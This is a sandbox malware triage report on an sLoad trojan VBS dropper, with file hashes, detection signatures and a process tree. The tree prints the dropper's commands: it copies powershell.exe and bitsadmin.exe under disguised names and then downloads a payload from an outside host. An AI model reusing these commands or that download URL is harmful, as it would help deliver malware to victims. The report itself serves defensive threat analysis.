sload | f6cb2ffe73e87a5d0053ca599d203d3dbc187d65b434d4c7c649c51ba2689505 | Triage

Analysis

max time kernel
132s
max time network
139s
platform
windows7_x64
resource
win7
submitted
14-09-2020 12:13

Sharing

Report Analysis Logs

General

Target

Allegato_doc_04198100168.vbs
Size

4KB
MD5

f13bf18a35cf7439790d91456f60f10b
SHA1

b8a280fb97a3aa64edbefda20d0463fcc2715d88
SHA256

f6cb2ffe73e87a5d0053ca599d203d3dbc187d65b434d4c7c649c51ba2689505
SHA512

365fb9e10566b33814b8eece5a09df71f3e406547284ae31500fc3715420595d30b7226fb596c2c5dd66a5c65d12d35f36ab28a9bdcc8e29a6f5246de533981b

Score

10^/10

trojan stealer sload

Malware Config

Signatures

sLoad
sLoad is a PowerShell downloader that can exfiltrate system information and deliver additional payloads.
trojan stealer sload
Executes dropped EXE 1 IoCs

Processes:

mvSS.exe

pid process

1832 mvSS.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

WScript.exe

description	pid	process	target process
PID 1316 wrote to memory of 1508	1316	WScript.exe	cmd.exe
PID 1316 wrote to memory of 1508	1316	WScript.exe	cmd.exe
PID 1316 wrote to memory of 1508	1316	WScript.exe	cmd.exe
PID 1316 wrote to memory of 1800	1316	WScript.exe	cmd.exe
PID 1316 wrote to memory of 1800	1316	WScript.exe	cmd.exe
PID 1316 wrote to memory of 1800	1316	WScript.exe	cmd.exe
PID 1316 wrote to memory of 1832	1316	WScript.exe	mvSS.exe
PID 1316 wrote to memory of 1832	1316	WScript.exe	mvSS.exe
PID 1316 wrote to memory of 1832	1316	WScript.exe	mvSS.exe
PID 1316 wrote to memory of 1832	1316	WScript.exe	mvSS.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Allegato_doc_04198100168.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1316

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\zmvSS.exe
2⤵
PID:1508

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\mvSS.exe
2⤵
PID:1800

C:\Users\Admin\AppData\Roaming\mvSS.exe
"C:\Users\Admin\AppData\Roaming\mvSS.exe" /transfer CZZkYL /download https://sapphireloading.com/sal/04198100168/blank.gif C:\Users\Admin\AppData\Roaming\blank.gif
2⤵
- Executes dropped EXE
PID:1832

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\mvSS.exe

Download Submit
C:\Users\Admin\AppData\Roaming\mvSS.exe

Download Submit
memory/1508-0-0x0000000000000000-mapping.dmp

Download
memory/1800-1-0x0000000000000000-mapping.dmp

Download
memory/1832-3-0x0000000000000000-mapping.dmp

Download